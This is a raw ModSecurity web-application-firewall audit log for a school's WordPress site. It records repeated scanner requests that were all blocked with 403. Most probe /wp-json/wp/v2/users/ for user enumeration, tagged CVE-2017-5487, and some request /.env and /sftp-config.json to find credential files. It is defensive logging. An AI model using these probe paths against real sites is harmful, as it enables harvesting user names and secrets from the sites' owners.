"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748540715670960 2864 (- - -) Stopwatch2: 1748540715670960 2864; combined=1302, p1=446, p2=826, p3=0, p4=0, p5=30, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53461543-Z-- --db17f30a-A-- [30/May/2025:01:04:55 +0700] aDihx2MaQtTb69S13pgizgAAAFg 103.236.140.4 32866 103.236.140.4 8181 --db17f30a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 52.221.179.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.221.179.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --db17f30a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db17f30a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748541895306964 2797 (- - -) Stopwatch2: 1748541895306964 2797; combined=1259, p1=428, p2=802, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db17f30a-Z-- --4b81dd23-A-- [30/May/2025:01:41:22 +0700] aDiqUn1Ye2lUDKzW1Lv9BQAAABc 103.236.140.4 34368 103.236.140.4 8181 --4b81dd23-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.176.195.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.176.195.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4b81dd23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b81dd23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748544082857302 3359 (- - -) Stopwatch2: 1748544082857302 3359; combined=1464, p1=458, p2=974, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b81dd23-Z-- --811c9765-A-- [30/May/2025:02:11:30 +0700] aDixYsX5pbyFXv2T3iqHXgAAANg 103.236.140.4 34502 103.236.140.4 8181 --811c9765-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --811c9765-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --811c9765-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748545890097433 712 (- - -) Stopwatch2: 1748545890097433 712; combined=254, p1=217, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --811c9765-Z-- --0eef540f-A-- [30/May/2025:02:16:21 +0700] aDiyhf4vV4CoZ0MKLMMLWAAAAI8 103.236.140.4 34516 103.236.140.4 8181 --0eef540f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.82.134.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.82.134.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0eef540f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eef540f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748546181903235 2677 (- - -) Stopwatch2: 1748546181903235 2677; combined=1225, p1=405, p2=790, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eef540f-Z-- --34a50657-A-- [30/May/2025:02:29:58 +0700] aDi1tmMaQtTb69S13pgkOQAAAEI 103.236.140.4 40626 103.236.140.4 8181 --34a50657-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 3.22.68.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 3.22.68.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --34a50657-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34a50657-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748546998154929 2633 (- - -) Stopwatch2: 1748546998154929 2633; combined=1194, p1=419, p2=745, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34a50657-Z-- --8f69e53c-A-- [30/May/2025:02:56:04 +0700] aDi71GMaQtTb69S13pgkTQAAAEo 103.236.140.4 40760 103.236.140.4 8181 --8f69e53c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.224.145.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.224.145.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8f69e53c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f69e53c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748548564687563 3456 (- - -) Stopwatch2: 1748548564687563 3456; combined=1446, p1=464, p2=950, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f69e53c-Z-- --35307212-A-- [30/May/2025:03:00:16 +0700] aDi80P4vV4CoZ0MKLMMNWQAAAIw 103.236.140.4 40786 103.236.140.4 8181 --35307212-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.166.27.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.166.27.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --35307212-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35307212-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748548816201115 3131 (- - -) Stopwatch2: 1748548816201115 3131; combined=1327, p1=456, p2=835, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35307212-Z-- --dc54f705-A-- [30/May/2025:03:17:11 +0700] aDjAx2MaQtTb69S13pgkWQAAAFA 103.236.140.4 40926 103.236.140.4 8181 --dc54f705-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.162 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --dc54f705-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc54f705-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748549831836474 837 (- - -) Stopwatch2: 1748549831836474 837; combined=339, p1=297, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc54f705-Z-- --5bbe323d-A-- [30/May/2025:03:17:23 +0700] aDjA02MaQtTb69S13pgkWgAAAEk 103.236.140.4 40928 103.236.140.4 8181 --5bbe323d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.162 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5bbe323d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5bbe323d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748549843913409 801 (- - -) Stopwatch2: 1748549843913409 801; combined=326, p1=283, p2=0, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bbe323d-Z-- --bb46df2a-A-- [30/May/2025:03:22:28 +0700] aDjCBGMaQtTb69S13pgkZgAAAE0 103.236.140.4 40960 103.236.140.4 8181 --bb46df2a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.210.52.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.210.52.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bb46df2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb46df2a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748550148697805 2090 (- - -) Stopwatch2: 1748550148697805 2090; combined=1034, p1=330, p2=677, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb46df2a-Z-- --d9846b0c-A-- [30/May/2025:03:38:20 +0700] aDjFvLoQWz54N7DBUCchlQAAAQg 103.236.140.4 41664 103.236.140.4 8181 --d9846b0c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.72.72.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.72.72.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d9846b0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9846b0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748551100561602 2794 (- - -) Stopwatch2: 1748551100561602 2794; combined=1223, p1=414, p2=779, p3=0, p4=0, p5=29, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9846b0c-Z-- --c4877e1c-A-- [30/May/2025:03:38:31 +0700] aDjFx7oQWz54N7DBUCchlwAAAQk 103.236.140.4 41670 103.236.140.4 8181 --c4877e1c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.148.62.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.148.62.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c4877e1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4877e1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748551111988080 2748 (- - -) Stopwatch2: 1748551111988080 2748; combined=1364, p1=471, p2=860, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4877e1c-Z-- --6d12771e-A-- [30/May/2025:03:40:09 +0700] aDjGKboQWz54N7DBUCchoAAAARQ 103.236.140.4 41694 103.236.140.4 8181 --6d12771e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.188 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --6d12771e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d12771e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748551209963224 881 (- - -) Stopwatch2: 1748551209963224 881; combined=359, p1=319, p2=0, p3=0, p4=0, p5=40, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d12771e-Z-- --19cea60e-A-- [30/May/2025:04:13:57 +0700] aDjOFRNBDSvkc-tIZOnbyAAAAEs 103.236.140.4 41884 103.236.140.4 8181 --19cea60e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 162.214.110.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.214.110.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --19cea60e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19cea60e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748553237255529 4010 (- - -) Stopwatch2: 1748553237255529 4010; combined=1728, p1=599, p2=1098, p3=0, p4=0, p5=31, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19cea60e-Z-- --ad41ac08-A-- [30/May/2025:04:40:51 +0700] aDjUY7W504ObxUT6RrzvcQAAAAA 103.236.140.4 42254 103.236.140.4 8181 --ad41ac08-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.148.41.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.148.41.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ad41ac08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad41ac08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748554851349607 3183 (- - -) Stopwatch2: 1748554851349607 3183; combined=1344, p1=484, p2=826, p3=0, p4=0, p5=34, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad41ac08-Z-- --aab2de24-A-- [30/May/2025:05:42:50 +0700] aDji6pxu2QkuXt3B9jaN2gAAAJc 103.236.140.4 42788 103.236.140.4 8181 --aab2de24-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.2.59.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.2.59.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aab2de24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aab2de24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748558570413877 3694 (- - -) Stopwatch2: 1748558570413877 3694; combined=1533, p1=535, p2=960, p3=0, p4=0, p5=37, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aab2de24-Z-- --b2871639-A-- [30/May/2025:06:17:27 +0700] aDjrB7W504ObxUT6RrzwzwAAABI 103.236.140.4 47722 103.236.140.4 8181 --b2871639-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.90.182.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.90.182.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b2871639-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2871639-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748560647345960 2590 (- - -) Stopwatch2: 1748560647345960 2590; combined=1200, p1=414, p2=712, p3=0, p4=0, p5=74, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
